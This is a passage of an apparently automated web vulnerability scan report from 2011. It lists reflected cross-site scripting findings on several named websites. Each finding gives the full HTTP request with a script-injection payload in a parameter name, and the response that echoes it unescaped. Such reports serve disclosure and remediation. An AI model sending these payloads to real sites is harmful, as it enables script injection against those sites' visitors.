/services/custsupport/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d7a2--><script>alert(1)</script>5b648993c12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:42 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:42 GMT Connection: close Content-Type: text/html Content-Length: 113672
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 --> ...[SNIP]...
3.95. http://www.isp-planet.com/services/custsupport/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/custsupport/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8ec51--><script>alert(1)</script>26fc08aec09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:39 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:39 GMT Connection: close Content-Type: text/html Content-Length: 58569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 --> ...[SNIP]...
3.96. http://www.isp-planet.com/services/ids/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/ids/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 746b8--><script>alert(1)</script>c8b224d10e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:40 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:40 GMT Connection: close Content-Type: text/html Content-Length: 84675
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems Q ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 --> ...[SNIP]...
3.97. http://www.isp-planet.com/services/ids/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/ids/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fbb17--><script>alert(1)</script>619ad1475d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:21 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:21 GMT Connection: close Content-Type: text/html Content-Length: 42637
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems D ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 --> ...[SNIP]...
3.98. http://www.isp-planet.com/services/merchants/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/merchants/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 245cd--><script>alert(1)</script>77839477c8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:42 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:42 GMT Connection: close Content-Type: text/html Content-Length: 57052
<HTML> <HEAD> <title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title> <meta name="channel" content="ISP Resources"> <meta name="author" content="Jeff Goldman"> <me ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 --> ...[SNIP]...
3.99. http://www.isp-planet.com/services/registrars/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/registrars/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf16b--><script>alert(1)</script>fe099ef085d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:39 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:39 GMT Connection: close Content-Type: text/html Content-Length: 85677
<HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title> <meta name="channel" content="ISP Resources"> <meta name="author" content="ISP-Planet Staff"> <meta name="company" ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 --> ...[SNIP]...
3.100. http://www.isp-planet.com/services/registrars/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/registrars/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1f04--><script>alert(1)</script>16711f55bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:23 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:23 GMT Connection: close Content-Type: text/html Content-Length: 52786
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title> <meta ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 --> ...[SNIP]...
3.101. http://www.isp-planet.com/services/trouble_ticket/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/trouble_ticket/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b81da--><script>alert(1)</script>798b74c10cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:43 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:43 GMT Connection: close Content-Type: text/html Content-Length: 64949
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Quick R ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 --> ...[SNIP]...
3.102. http://www.isp-planet.com/services/trouble_ticket/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/trouble_ticket/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7a2c--><script>alert(1)</script>70392a62872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:42 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:42 GMT Connection: close Content-Type: text/html Content-Length: 49484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Directo ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 --> ...[SNIP]...
3.103. http://www.isp-planet.com/services/voip_wholesalers/chart.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/voip_wholesalers/chart.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5d4d0--><script>alert(1)</script>fb8d8fcf9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:45 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:45 GMT Connection: close Content-Type: text/html Content-Length: 85300
<HTML> <HEAD> <title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title> <meta name="channel" content="ISP Resources"> <meta name="author" content="Jeff Goldm ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 --> ...[SNIP]...
3.104. http://www.isp-planet.com/services/voip_wholesalers/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/voip_wholesalers/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2777d--><script>alert(1)</script>a0764eaf025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:45 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:45 GMT Connection: close Content-Type: text/html Content-Length: 50503
<HTML> <HEAD> <title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Directory</title> <meta name="channel" content="ISP Resources"> <meta name="author" content="Jeff Goldman"> <meta ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 --> ...[SNIP]...
3.105. http://www.isp-planet.com/services/webmail/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.isp-planet.com
Path:
/services/webmail/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c270e--><script>alert(1)</script>95e5514ff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 HTTP/1.1 Host: www.isp-planet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:13:43 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:14:43 GMT Connection: close Content-Type: text/html Content-Length: 52664
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>ISP-Planet - Value-Added Services - Webmail Directory</title> <m ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1 url: /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 --> ...[SNIP]...
3.106. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.liverpoolonlinedegrees.co.uk
Path:
/2x/prequal.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60daf"><script>alert(1)</script>16c9b78682c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2x/prequal.jsp?60daf"><script>alert(1)</script>16c9b78682c=1 HTTP/1.1 Host: www.liverpoolonlinedegrees.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE" Cache-Control: public Content-Type: text/html;charset=ISO-8859-1 Date: Fri, 18 Feb 2011 15:01:06 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=N-jN3kyh3uilQ9ki86RTyA**.app2-all2; Path=/ Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/ Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/ Content-Length: 32995
3.107. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.outsourcingdotnetdevelopment.com
Path:
/outsourcing-dot-net-development-contact-us.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af71b"><script>alert(1)</script>c827934797a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outsourcing-dot-net-development-contact-us.html?af71b"><script>alert(1)</script>c827934797a=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Proxy-Connection: keep-alive Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81
3.108. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.outsourcingdotnetdevelopment.com
Path:
/xss-cross-site-scripting.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3906b"><script>alert(1)</script>e3021d3c780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss-cross-site-scripting.html?3906b"><script>alert(1)</script>e3021d3c780=1 HTTP/1.1 Host: www.outsourcingdotnetdevelopment.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:58:14 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81; path=/ Connection: close Content-Type: text/html Content-Length: 18193
